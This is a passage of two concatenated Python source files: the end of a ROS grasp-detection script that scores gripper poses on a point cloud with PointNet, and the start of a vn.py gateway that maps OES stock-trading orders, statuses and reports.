    rospy.loginfo("Grasp sampler finish, generated {} grasps.".format(len(grasps_together_)))
    return grasps_together_, points_, surface_normal
def check_collision_square(grasp_bottom_center, approach_normal, binormal,
                           minor_pc, points_, p, way="p_open"):
    """Test which cloud points fall inside one region of the gripper.

    Expresses points_ in the gripper frame spanned by the normalized
    (approach_normal, binormal, minor_pc) axes anchored at
    grasp_bottom_center, then checks them against an axis-aligned box
    for the region selected by `way`.

    Returns (has_p, points_in_area, points_g): whether any point is in
    the region, the indices of those points, and the whole cloud in the
    gripper frame.
    """
    # Normalize the three axes and build the world->gripper rotation.
    approach_normal = approach_normal.reshape(1, 3)
    approach_normal = approach_normal / np.linalg.norm(approach_normal)
    binormal = binormal.reshape(1, 3)
    binormal = binormal / np.linalg.norm(binormal)
    minor_pc = minor_pc.reshape(1, 3)
    minor_pc = minor_pc / np.linalg.norm(minor_pc)
    matrix_ = np.hstack([approach_normal.T, binormal.T, minor_pc.T])
    grasp_matrix = matrix_.T
    # Translate to the bottom center, then rotate into the gripper frame.
    points_ = points_ - grasp_bottom_center.reshape(1, 3)
    tmp = np.dot(grasp_matrix, points_.T)
    points_g = tmp.T
    use_dataset_py = True
    if not use_dataset_py:
        # Box bounds read off precomputed hand points p for each region.
        if way == "p_open":
            s1, s2, s4, s8 = p[1], p[2], p[4], p[8]
        elif way == "p_left":
            s1, s2, s4, s8 = p[9], p[1], p[10], p[12]
        elif way == "p_right":
            s1, s2, s4, s8 = p[2], p[13], p[3], p[7]
        elif way == "p_bottom":
            s1, s2, s4, s8 = p[11], p[15], p[12], p[20]
        else:
            raise ValueError('No way!')
        a1 = s1[1] < points_g[:, 1]
        a2 = s2[1] > points_g[:, 1]
        a3 = s1[2] > points_g[:, 2]
        a4 = s4[2] < points_g[:, 2]
        a5 = s4[0] > points_g[:, 0]
        a6 = s8[0] < points_g[:, 0]
        a = np.vstack([a1, a2, a3, a4, a5, a6])
        points_in_area = np.where(np.sum(a, axis=0) == len(a))[0]
        if len(points_in_area) == 0:
            has_p = False
        else:
            has_p = True
    # for the way of pointGPD/dataset.py:
    else:
        # Analytic box from the gripper geometry.
        # NOTE(review): this active branch ignores `way` and always
        # tests the open region between the fingers.
        width = ags.gripper.hand_outer_diameter - 2 * ags.gripper.finger_width
        x_limit = ags.gripper.hand_depth
        z_limit = width / 4
        y_limit = width / 2
        x1 = points_g[:, 0] > 0
        x2 = points_g[:, 0] < x_limit
        y1 = points_g[:, 1] > -y_limit
        y2 = points_g[:, 1] < y_limit
        z1 = points_g[:, 2] > -z_limit
        z2 = points_g[:, 2] < z_limit
        a = np.vstack([x1, x2, y1, y2, z1, z2])
        points_in_area = np.where(np.sum(a, axis=0) == len(a))[0]
        if len(points_in_area) == 0:
            has_p = False
        else:
            has_p = True
    vis = False
    if vis:
        p = points_g
        mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(0, 0, 1))
        p = points_g[points_in_area]
        mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(1, 0, 0))
        p = ags.get_hand_points(np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 1, 0]))
        mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.005, color=(0, 1, 0))
        mlab.show()
    return has_p, points_in_area, points_g
def collect_pc(grasp_, pc):
    """
    For each grasp [grasp_bottom_center, normal, major_pc, minor_pc, ...],
    gather the indices and gripper-frame coordinates of the cloud points
    that fall inside the gripper's open region.

    Returns (per-grasp index arrays, per-grasp gripper-frame points).
    """
    count = len(grasp_)
    # Reshape guards against a single grasp arriving flattened.
    grasp_arr = np.array(grasp_).reshape(-1, 5, 3)
    bottom_centers = grasp_arr[:, 0]
    approach_normals = grasp_arr[:, 1]
    binormals = grasp_arr[:, 2]
    minor_pcs = grasp_arr[:, 3]
    hand_points = ags.get_hand_points(np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 1, 0]))
    in_ind_ = []
    in_ind_points_ = []
    for i_ in range(count):
        _, inside_idx, points_g = check_collision_square(
            bottom_centers[i_], approach_normals[i_],
            binormals[i_], minor_pcs[i_], pc, hand_points)
        in_ind_.append(inside_idx)
        in_ind_points_.append(points_g[inside_idx])
    return in_ind_, in_ind_points_
def show_marker(marker_array_, pos_, ori_, scale_, color_, lifetime_):
    """Append a semi-transparent cube marker to marker_array_.

    pos_ and scale_ are xyz triples; ori_ is a quaternion whose element
    0 is w (pyquaternion layout), remapped here to ROS (x, y, z, w);
    color_ is an (r, g, b) triple; lifetime_ is in seconds.
    """
    cube = Marker()
    cube.header.frame_id = "/table_top"
    cube.type = cube.CUBE
    cube.action = cube.ADD
    cube.pose.position.x = pos_[0]
    cube.pose.position.y = pos_[1]
    cube.pose.position.z = pos_[2]
    # ori_[0] is w; ROS stores w last.
    cube.pose.orientation.x = ori_[1]
    cube.pose.orientation.y = ori_[2]
    cube.pose.orientation.z = ori_[3]
    cube.pose.orientation.w = ori_[0]
    cube.lifetime = rospy.Duration.from_sec(lifetime_)
    cube.scale.x = scale_[0]
    cube.scale.y = scale_[1]
    cube.scale.z = scale_[2]
    cube.color.a = 0.5  # semi-transparent
    red_, green_, blue_ = color_
    cube.color.r = red_
    cube.color.g = green_
    cube.color.b = blue_
    marker_array_.markers.append(cube)
def show_grasp_marker(marker_array_, real_grasp_, gripper_, color_, lifetime_):
    """
    show grasp using marker
    :param marker_array_: marker array
    :param real_grasp_: [0] position, [1] approach [2] binormal [3] minor pc
    :param gripper_: gripper parameter of a grasp
    :param color_: color of the gripper
    :param lifetime_: time for showing the maker
    :return: return add makers to the maker array
    """
    hand_height = gripper_.hand_height
    finger_w = gripper_.real_finger_width
    outer_d = gripper_.hand_outer_diameter
    depth = gripper_.real_hand_depth
    open_width = outer_d - 2 * finger_w
    approach = real_grasp_[1]
    binormal = real_grasp_[2]
    minor_pc = real_grasp_[3]
    # Shift the bottom center back along the approach axis by the
    # difference between the real and nominal hand depths.
    grasp_bottom_center = real_grasp_[4] - approach * (gripper_.real_hand_depth - gripper_.hand_depth)
    # Orientation of all three cubes comes from the grasp frame axes.
    qua = Quaternion(matrix=np.vstack([approach, binormal, minor_pc]).T)
    bottom_pos = grasp_bottom_center - approach * hand_height * 0.5
    left_pos = grasp_bottom_center - binormal * (open_width * 0.5 + finger_w * 0.5) + depth * 0.5 * approach
    right_pos = grasp_bottom_center + binormal * (open_width * 0.5 + finger_w * 0.5) + depth * 0.5 * approach
    # One cube for the palm, one per finger.
    show_marker(marker_array_, bottom_pos, qua, np.array([hand_height, outer_d, hand_height]), color_, lifetime_)
    show_marker(marker_array_, left_pos, qua, np.array([depth, finger_w, hand_height]), color_, lifetime_)
    show_marker(marker_array_, right_pos, qua, np.array([depth, finger_w, hand_height]), color_, lifetime_)
def check_hand_points_fun(real_grasp_):
    """Count, for each grasp, the cloud points inside the gripper's open
    region and dump the counts to an .npy file.

    NOTE(review): reads the module-level `points` cloud instead of a
    parameter, and the output filename uses a random integer so repeated
    runs may collide -- confirm this is intentional.
    """
    ind_points_num = []
    for i in range(len(real_grasp_)):
        grasp_bottom_center = real_grasp_[i][4]
        approach_normal = real_grasp_[i][1]
        binormal = real_grasp_[i][2]
        minor_pc = real_grasp_[i][3]
        local_hand_points = ags.get_hand_points(np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 1, 0]))
        has_points_tmp, ind_points_tmp = ags.check_collision_square(grasp_bottom_center, approach_normal,
                                                                    binormal, minor_pc, points,
                                                                    local_hand_points, "p_open")
        ind_points_num.append(len(ind_points_tmp))
    print(ind_points_num)
    file_name = "./generated_grasps/real_points/" + str(np.random.randint(300)) + str(len(real_grasp_)) + ".npy"
    np.save(file_name, np.array(ind_points_num))
def get_grasp_msg(real_good_grasp_, score_value_):
    """Build a GraspConfig message from one grasp.

    real_good_grasp_ layout: [1] approach, [2] binormal, [3] minor axis,
    [4] (modified) bottom center.  score_value_ is the classifier score.
    """
    grasp_bottom_center_modify = real_good_grasp_[4]
    approach = real_good_grasp_[1]
    binormal = real_good_grasp_[2]
    minor_pc = real_good_grasp_[3]
    grasp_config_ = GraspConfig()
    # Top of the hand: bottom center advanced by hand depth along approach.
    top_p_ = grasp_bottom_center_modify + approach * ags.gripper.hand_depth
    grasp_config_.sample.x = grasp_bottom_center_modify[0]
    grasp_config_.sample.y = grasp_bottom_center_modify[1]
    grasp_config_.sample.z = grasp_bottom_center_modify[2]
    grasp_config_.top.x = top_p_[0]
    grasp_config_.top.y = top_p_[1]
    grasp_config_.top.z = top_p_[2]
    grasp_config_.approach.x = approach[0]
    grasp_config_.approach.y = approach[1]
    grasp_config_.approach.z = approach[2]
    grasp_config_.binormal.x = binormal[0]
    grasp_config_.binormal.y = binormal[1]
    grasp_config_.binormal.z = binormal[2]
    grasp_config_.axis.x = minor_pc[0]
    grasp_config_.axis.y = minor_pc[1]
    grasp_config_.axis.z = minor_pc[2]
    grasp_config_.score.data = score_value_
    return grasp_config_
def remove_grasp_outside_tray(grasps_, points_):
    """Keep only grasps whose finger points stay within the xy bounding
    box of points_ (the tray area).

    TODO: work of remove outside grasp not finished -- the bounding box
    is an approximation of the tray outline.
    """
    x_lo, x_hi = points_[:, 0].min(), points_[:, 0].max()
    y_lo, y_hi = points_[:, 1].min(), points_[:, 1].max()
    grasps_inside_ = []
    for grasp in grasps_:
        hand_pts = ags.get_hand_points(grasp[4], grasp[1], grasp[2])
        # Rows of the hand-point set that belong to the fingers.
        fingers = hand_pts[[1, 2, 3, 4, 9, 10, 13, 14], :]
        outside = ((fingers[:, 0] < x_lo) | (fingers[:, 0] > x_hi) |
                   (fingers[:, 1] < y_lo) | (fingers[:, 1] > y_hi))
        if not outside.any():
            grasps_inside_.append(grasp)
    rospy.loginfo("gpg got {} grasps, after remove grasp outside tray, {} grasps left".format(len(grasps_),
                                                                                              len(grasps_inside_)))
    return grasps_inside_
if __name__ == '__main__':
    """
    definition of gotten grasps:
    grasp_bottom_center = grasp_[0]
    approach_normal = grasp_[1]
    binormal = grasp_[2]
    """
    rospy.init_node('grasp_tf_broadcaster', anonymous=True)
    pub1 = rospy.Publisher('gripper_vis', MarkerArray, queue_size=1)
    pub2 = rospy.Publisher('/detect_grasps/clustered_grasps', GraspConfigList, queue_size=1)
    rate = rospy.Rate(10)
    rospy.set_param("/robot_at_home", "true")  # only use when in simulation test.
    rospy.loginfo("getting transform from kinect2 to table top")
    cam_pos = []
    listener = tf.TransformListener()
    get_transform = False
    # Block until the static camera->table transform is available.
    while not get_transform:
        try:
            cam_pos, _ = listener.lookupTransform('/table_top', '/kinect2_ir_optical_frame', rospy.Time(0))
            get_transform = True
            rospy.loginfo("got transform complete")
        except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
            continue
    # Main perception/scoring/publishing loop.
    while not rospy.is_shutdown():
        if rospy.get_param("/robot_at_home") == "false":
            robot_at_home = False
        else:
            robot_at_home = True
        if not robot_at_home:
            rospy.loginfo("Robot is moving, waiting the robot go home.")
            continue
        else:
            rospy.loginfo("Robot is at home, safely catching point cloud data.")
        if single_obj_testing:
            input("Pleas put object on table and press any number to continue!")
        rospy.loginfo("rospy is waiting for message: /table_top_points")
        kinect_data = rospy.wait_for_message("/table_top_points", PointCloud2)
        real_good_grasp = []
        real_bad_grasp = []
        real_score_value = []
        repeat = 1  # speed up this try 10 time is too time consuming
        # begin of grasp detection
        # if there is no point cloud on table, waiting for point cloud.
        if kinect_data.data == '':
            rospy.loginfo("There is no points on the table, waiting...")
            continue
        real_grasp, points, normals_cal = cal_grasp(kinect_data, cam_pos)
        if tray_grasp:
            real_grasp = remove_grasp_outside_tray(real_grasp, points)
        check_grasp_points_num = True  # evaluate the number of points in a grasp
        # NOTE(review): conditional expression used purely for its side effect.
        check_hand_points_fun(real_grasp) if check_grasp_points_num else 0
        in_ind, in_ind_points = collect_pc(real_grasp, points)
        if save_grasp_related_file:
            np.save("./generated_grasps/points.npy", points)
            np.save("./generated_grasps/in_ind.npy", in_ind)
            np.save("./generated_grasps/real_grasp.npy", real_grasp)
            np.save("./generated_grasps/cal_norm.npy", normals_cal)
        score = []  # should be 0 or 1
        score_value = []  # should be float [0, 1]
        ind_good_grasp = []
        ind_bad_grasp = []
        rospy.loginfo("Begin send grasp into pointnet, cal grasp score")
        # Score every candidate grasp with the PointNet classifier.
        for ii in range(len(in_ind_points)):
            if rospy.get_param("/robot_at_home") == "false":
                robot_at_home = False
            else:
                robot_at_home = True
            if not robot_at_home:
                rospy.loginfo("robot is not at home, stop calculating the grasp score")
                break
            if in_ind_points[ii].shape[0] < minimal_points_send_to_point_net:
                rospy.loginfo("Mark as bad grasp! Only {} points, should be at least {} points.".format(
                              in_ind_points[ii].shape[0], minimal_points_send_to_point_net))
                score.append(0)
                score_value.append(0.0)
                if show_bad_grasp:
                    ind_bad_grasp.append(ii)
            else:
                predict = []
                grasp_score = []
                # Sample a fixed-size point set (with or without
                # replacement) and classify it `repeat` times.
                for _ in range(repeat):
                    if len(in_ind_points[ii]) >= input_points_num:
                        points_modify = in_ind_points[ii][np.random.choice(len(in_ind_points[ii]),
                                                                           input_points_num, replace=False)]
                    else:
                        points_modify = in_ind_points[ii][np.random.choice(len(in_ind_points[ii]),
                                                                           input_points_num, replace=True)]
                    if_good_grasp, grasp_score_tmp = test_network(model.eval(), points_modify)
                    predict.append(if_good_grasp.item())
                    grasp_score.append(grasp_score_tmp)
                predict_vote = mode(predict)[0][0]  # vote from all the "repeat" results.
                grasp_score = np.array(grasp_score)
                if args.model_type == "3class":  # the best in 3 class classification is the last column, third column
                    which_one_is_best = 2  # should set as 2
                else:  # for two class classification best is the second column (also the last column)
                    which_one_is_best = 1  # should set as 1
                score_vote = np.mean(grasp_score[np.where(predict == predict_vote)][:, 0, which_one_is_best])
                score.append(predict_vote)
                score_value.append(score_vote)
                if score[ii] == which_one_is_best:
                    ind_good_grasp.append(ii)
                else:
                    if show_bad_grasp:
                        ind_bad_grasp.append(ii)
        print("Got {} good grasps, and {} bad grasps".format(len(ind_good_grasp),
                                                             len(in_ind_points) - len(ind_good_grasp)))
        if len(ind_good_grasp) != 0:
            real_good_grasp = [real_grasp[i] for i in ind_good_grasp]
            real_score_value = [score_value[i] for i in ind_good_grasp]
            if show_bad_grasp:
                real_bad_grasp = [real_grasp[i] for i in ind_bad_grasp]
        # end of grasp detection
        # get sorted ind by the score values
        sorted_value_ind = list(index for index, item in sorted(enumerate(real_score_value),
                                                                key=lambda item: item[1],
                                                                reverse=True))
        # sort grasps using the ind
        sorted_real_good_grasp = [real_good_grasp[i] for i in sorted_value_ind]
        real_good_grasp = sorted_real_good_grasp
        # get the sorted score value, from high to low
        real_score_value = sorted(real_score_value, reverse=True)
        marker_array = MarkerArray()
        marker_array_single = MarkerArray()
        grasp_msg_list = GraspConfigList()
        for i in range(len(real_good_grasp)):
            grasp_msg = get_grasp_msg(real_good_grasp[i], real_score_value[i])
            grasp_msg_list.grasps.append(grasp_msg)
        for i in range(len(real_good_grasp)):
            show_grasp_marker(marker_array, real_good_grasp[i], gripper, (0, 1, 0), marker_life_time)
        if show_bad_grasp:
            for i in range(len(real_bad_grasp)):
                show_grasp_marker(marker_array, real_bad_grasp[i], gripper, (1, 0, 0), marker_life_time)
        # Give every marker a unique id so rviz does not merge them.
        id_ = 0
        for m in marker_array.markers:
            m.id = id_
            id_ += 1
        grasp_msg_list.header.stamp = rospy.Time.now()
        grasp_msg_list.header.frame_id = "/table_top"
        # Publish only the single best grasp plus the visualization markers.
        if len(real_good_grasp) != 0:
            i = 0
            single_grasp_list_pub = GraspConfigList()
            single_grasp_list_pub.header.stamp = rospy.Time.now()
            single_grasp_list_pub.header.frame_id = "/table_top"
            grasp_msg = get_grasp_msg(real_good_grasp[i], real_score_value[i])
            single_grasp_list_pub.grasps.append(grasp_msg)
            show_grasp_marker(marker_array_single, real_good_grasp[i], gripper, (1, 0, 0), marker_life_time+20)
            for m in marker_array_single.markers:
                m.id = id_
                id_ += 1
            pub1.publish(marker_array)
            rospy.sleep(4)
            pub2.publish(single_grasp_list_pub)
            pub1.publish(marker_array_single)
            # pub2.publish(grasp_msg_list)
        rospy.loginfo(" Publishing grasp pose to rviz using marker array and good grasp pose")
        rate.sleep()
|
oes_td.py
|
import time
from copy import copy
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from gettext import gettext as _
from threading import Lock, Thread
# noinspection PyUnresolvedReferences
from typing import Any, Callable, Dict
from vnpy.api.oes.vnoes import OesApiClientEnvT, OesApiSubscribeInfoT, OesApi_DestoryAll, \
OesApi_InitLogger, OesApi_InitOrdChannel2, OesApi_InitQryChannel2, OesApi_InitRptChannel2, \
OesApi_LogoutAll, OesApi_QueryCashAsset, \
OesApi_QueryOptHolding, OesApi_QueryOption, OesApi_QueryOrder, OesApi_QueryStkHolding, \
OesApi_QueryStock, OesApi_SendOrderCancelReq, OesApi_SendOrderReq, OesApi_SetCustomizedDriverId, \
OesApi_SetThreadPassword, OesApi_SetThreadUsername, OesApi_WaitReportMsg, OesOrdCancelReqT, \
OesOrdCnfmT, OesOrdRejectT, OesOrdReqT, OesQryCashAssetFilterT, OesQryCursorT, \
OesQryOptionFilterT, OesQryOrdFilterT, OesQryStkHoldingFilterT, OesQryStockFilterT, \
OesRspMsgBodyT, OesStockBaseInfoT, OesTrdCnfmT, SGeneralClientChannelT, SMSG_PROTO_BINARY, \
SMsgHeadT, cast, eOesBuySellTypeT, eOesMarketIdT, eOesMsgTypeT, \
eOesOrdStatusT, eOesOrdTypeShT, eOesOrdTypeSzT, eOesSubscribeReportTypeT, \
OesApi_SetCustomizedIpAndMac
from vnpy.gateway.oes.error_code import error_to_str
from vnpy.gateway.oes.utils import create_remote_config, is_disconnected
from vnpy.trader.constant import Direction, Exchange, Offset, OrderType, Product, Status
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import AccountData, CancelRequest, ContractData, OrderData, OrderRequest, \
PositionData, TradeData
# OES market id -> vn.py exchange.
EXCHANGE_OES2VT = {
    eOesMarketIdT.OES_MKT_SH_ASHARE: Exchange.SSE,
    eOesMarketIdT.OES_MKT_SZ_ASHARE: Exchange.SZSE,
    eOesMarketIdT.OES_MKT_SH_OPTION: Exchange.SHFE,
}
EXCHANGE_VT2OES = {v: k for k, v in EXCHANGE_OES2VT.items()}
# OES market id -> product type (SH options mapped to FUTURES here).
PRODUCT_OES2VT = {
    eOesMarketIdT.OES_MKT_SH_ASHARE: Product.EQUITY,
    eOesMarketIdT.OES_MKT_SZ_ASHARE: Product.EQUITY,
    eOesMarketIdT.OES_MKT_SH_OPTION: Product.FUTURES,
}
# only limit price can match, all other price types are not perfectly match.
ORDER_TYPE_VT2OES = {
    (Exchange.SSE, OrderType.LIMIT): eOesOrdTypeShT.OES_ORD_TYPE_SH_LMT,
    (Exchange.SZSE, OrderType.LIMIT): eOesOrdTypeSzT.OES_ORD_TYPE_SZ_LMT,
}
ORDER_TYPE_OES2VT = {
    (eOesMarketIdT.OES_MKT_SH_ASHARE, eOesOrdTypeShT.OES_ORD_TYPE_SH_LMT): OrderType.LIMIT,
    (eOesMarketIdT.OES_MKT_SZ_ASHARE, eOesOrdTypeSzT.OES_ORD_TYPE_SZ_LMT): OrderType.LIMIT,
}
# (exchange, offset, direction) -> OES buy/sell type.
BUY_SELL_TYPE_VT2OES = {
    (Exchange.SSE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY,
    (Exchange.SSE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL,
    (Exchange.SSE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY,
    (Exchange.SSE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_SELL,
    (Exchange.SSE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_BUY,
    (Exchange.SSE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_SELL,
    (Exchange.SZSE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY,
    (Exchange.SZSE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL,
    (Exchange.SZSE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY,
    (Exchange.SZSE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_SELL,
    (Exchange.SZSE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_BUY,
    (Exchange.SZSE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_SELL,
    (Exchange.SHFE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY_OPEN,
    (Exchange.SHFE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL_OPEN,
    (Exchange.SHFE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY_OPEN,
    (Exchange.SHFE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY_CLOSE,
    (Exchange.SHFE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL_CLOSE,
    (Exchange.SHFE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY_CLOSE,
}
# OES order status -> vn.py order status.
STATUS_OES2VT = {
    eOesOrdStatusT.OES_ORD_STATUS_NEW: Status.NOTTRADED,
    eOesOrdStatusT.OES_ORD_STATUS_DECLARED: Status.NOTTRADED,
    eOesOrdStatusT.OES_ORD_STATUS_PARTIALLY_FILLED: Status.PARTTRADED,
    eOesOrdStatusT.OES_ORD_STATUS_FILLED: Status.ALLTRADED,
    eOesOrdStatusT.OES_ORD_STATUS_CANCEL_DONE: Status.CANCELLED,
    eOesOrdStatusT.OES_ORD_STATUS_PARTIALLY_CANCELED: Status.CANCELLED,
    eOesOrdStatusT.OES_ORD_STATUS_CANCELED: Status.CANCELLED,
    eOesOrdStatusT.OES_ORD_STATUS_INVALID_OES: Status.REJECTED,
    eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_F: Status.REJECTED,
    eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_E: Status.REJECTED,
    eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_COMM: Status.REJECTED,
    eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_F: Status.REJECTED,
    eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_E: Status.REJECTED,
    eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_REJECT: Status.REJECTED,
    eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_TRY_AGAIN: Status.REJECTED,
}
# Beijing time (UTC+8); used when attaching tzinfo to OES timestamps.
bjtz = timezone(timedelta(hours=8))
@dataclass
class InternalOrder:
    """Pairs an OES client sequence number with its vn.py OrderData."""

    # OES clSeqNo used as the local order id (None until assigned)
    order_id: int = None
    # the vn.py-side order object tracked under that id
    vt_order: OrderData = None
def parse_oes_datetime(date: int, time: int):
    """Convert an OES integer date (YYYYMMDD) and time (HHMMSSsss) into an
    aware ``datetime`` in Beijing time."""
    # Split YYYYMMDD into its components.
    year, md = divmod(date, 10000)
    month, day = divmod(md, 100)
    # Split HHMMSSsss into its components.
    hour, rem = divmod(time, 10000000)
    minute, rem = divmod(rem, 100000)
    sec, mill = divmod(rem, 1000)
    return datetime(year, month, day, hour, minute, sec, mill * 1000, tzinfo=bjtz)
class OesTdMessageLoop:
    """Receive loop for the OES report (rpt) channel.

    Runs a background thread that waits for report messages and dispatches
    them, by message id, to handlers that convert OES structures into vn.py
    events on the owning gateway.
    """

    def __init__(self,
                 gateway: BaseGateway,
                 env: OesApiClientEnvT,
                 td: "OesTdApi",
                 order_manager: "OrderManager",
                 ):
        """Bind the loop to a gateway, API environment, td api and order manager."""
        self.gateway = gateway
        self._env = env
        self._td = td
        self._order_manager = order_manager
        self._alive = False
        self._th = Thread(target=self._message_loop)
        # Dispatch table: OES message id -> handler(body) -> int
        self.message_handlers: Dict[eOesMsgTypeT, Callable[[OesRspMsgBodyT], int]] = {
            eOesMsgTypeT.OESMSG_RPT_BUSINESS_REJECT: self.on_order_rejected,
            eOesMsgTypeT.OESMSG_RPT_ORDER_INSERT: self.on_order_inserted,
            eOesMsgTypeT.OESMSG_RPT_ORDER_REPORT: self.on_order_report,
            eOesMsgTypeT.OESMSG_RPT_TRADE_REPORT: self.on_trade_report,
            eOesMsgTypeT.OESMSG_RPT_STOCK_HOLDING_VARIATION: self.on_stock_holding,
            eOesMsgTypeT.OESMSG_RPT_OPTION_HOLDING_VARIATION: self.on_option_holding,
            eOesMsgTypeT.OESMSG_RPT_CASH_ASSET_VARIATION: self.on_cash,
            # synchronization / heartbeat messages need no processing
            eOesMsgTypeT.OESMSG_RPT_REPORT_SYNCHRONIZATION: lambda x: 1,
            eOesMsgTypeT.OESMSG_SESS_HEARTBEAT: lambda x: 1,
        }

    def start(self):
        """Start the receive thread (no-op if already started; not thread-safe)."""
        if not self._alive:  # not thread-safe
            self._alive = True
            self._th.start()

    def stop(self):
        """Ask the receive thread to exit after its current wait times out."""
        self._alive = False

    def join(self):
        """Block until the receive thread has exited."""
        self._th.join()

    def reconnect(self):
        """Re-establish the report channel.

        BUGFIX: the connect result is now returned; previously this returned
        None, so the ``while ... not self.reconnect()`` retry loop in
        _message_loop could never observe a successful reconnect.
        """
        self.gateway.write_log(_("正在尝试重新连接到交易服务器。"))
        return self._td.connect_rpt_channel()

    def _on_message(self, session_info: SGeneralClientChannelT,
                    head: SMsgHeadT,
                    body: Any):
        """Low-level callback from OesApi_WaitReportMsg: route one message."""
        if session_info.protocolType == SMSG_PROTO_BINARY:
            b = cast.toOesRspMsgBodyT(body)
            if head.msgId in self.message_handlers:
                self.message_handlers[head.msgId](b)
            else:
                self.gateway.write_log(
                    f"unknown msg id : {head.msgId} {eOesMsgTypeT(head.msgId)}")
        else:
            self.gateway.write_log(f"unknown prototype : {session_info.protocolType}")
        return 1

    def _message_loop(self):
        """Thread body: pump report messages until stop() is called."""
        rpt_channel = self._env.rptChannel
        timeout_ms = 1000
        while self._alive:
            ret = OesApi_WaitReportMsg(rpt_channel,
                                       timeout_ms,
                                       self._on_message)
            if ret < 0:
                # a plain timeout is also reported as ret < 0; only a real
                # disconnect triggers the reconnect loop below
                if is_disconnected(ret):
                    self.gateway.write_log(_("与交易服务器的连接已断开。"))
                    while self._alive and not self.reconnect():
                        pass
        return

    def on_order_rejected(self, d: OesRspMsgBodyT):
        """Handle a business-reject report (new order or cancel rejected)."""
        error_code = d.rptMsg.rptHead.ordRejReason
        error_string = error_to_str(error_code)
        data: OesOrdRejectT = d.rptMsg.rptBody.ordRejectRsp
        if not data.origClSeqNo:
            # origClSeqNo == 0: the rejected request was a new order
            try:
                i = self._order_manager.get_order(data.clSeqNo)
            except KeyError:
                return  # rejected order created by others, don't need to care.
            vt_order = i.vt_order
            # BUGFIX: the original compared the OrderData object itself with
            # Status.ALLTRADED (always False); compare its status field.
            if vt_order.status == Status.ALLTRADED:
                return
            vt_order.status = Status.REJECTED
            self.gateway.on_order(copy(vt_order))
            self.gateway.write_log(
                f"Order: {vt_order.vt_symbol}-{vt_order.vt_orderid} Code: {error_code} Rejected: {error_string}")
        else:
            # origClSeqNo set: a cancel request was rejected
            self.gateway.write_log(f"撤单失败,订单号: {data.origClSeqNo}。原因:{error_string}")

    def on_order_inserted(self, d: OesRspMsgBodyT):
        """Handle an order-insert acknowledgement from OES."""
        data = d.rptMsg.rptBody.ordInsertRsp
        vt_order = self._order_manager.oes_order_to_vt(data)
        self.gateway.on_order(copy(vt_order))

    def on_order_report(self, d: OesRspMsgBodyT):
        """Handle an order status report from the exchange."""
        data: OesOrdCnfmT = d.rptMsg.rptBody.ordCnfm
        vt_order = self._order_manager.oes_order_to_vt(data)
        self.gateway.on_order(copy(vt_order))

    def on_trade_report(self, d: OesRspMsgBodyT):
        """Handle a fill report: emit a TradeData and refresh the order."""
        data: OesTrdCnfmT = d.rptMsg.rptBody.trdCnfm
        i = self._order_manager.get_order(data.clSeqNo)
        vt_order = i.vt_order
        trade = TradeData(
            gateway_name=self.gateway.gateway_name,
            symbol=data.securityId,
            exchange=EXCHANGE_OES2VT[data.mktId],
            orderid=str(data.clSeqNo),
            tradeid=str(data.exchTrdNum),
            direction=vt_order.direction,
            offset=vt_order.offset,
            price=data.trdPrice / 10000,  # OES prices are in 1/10000 units
            volume=data.trdQty,
            time=parse_oes_datetime(data.trdDate, data.trdTime).isoformat()
        )
        vt_order.status = STATUS_OES2VT[data.ordStatus]
        vt_order.traded = data.cumQty
        vt_order.time = parse_oes_datetime(data.trdDate, data.trdTime)
        self.gateway.on_trade(trade)
        self.gateway.on_order(copy(vt_order))

    def on_option_holding(self, d: OesRspMsgBodyT):
        """Option holding variations are currently ignored."""
        pass

    def on_stock_holding(self, d: OesRspMsgBodyT):
        """Handle a stock holding variation: emit a net PositionData."""
        data = d.rptMsg.rptBody.stkHoldingRpt
        position = PositionData(
            gateway_name=self.gateway.gateway_name,
            symbol=data.securityId,
            exchange=EXCHANGE_OES2VT[data.mktId],
            direction=Direction.NET,
            volume=data.sumHld,
            frozen=data.lockHld,
            price=data.costPrice / 10000,
            # pnl=data.costPrice - data.originalCostAmt,
            pnl=0,
            yd_volume=data.originalHld,
        )
        self.gateway.on_position(position)

    def on_cash(self, d: OesRspMsgBodyT):
        """Handle a cash asset variation: emit an AccountData."""
        data = d.rptMsg.rptBody.cashAssetRpt
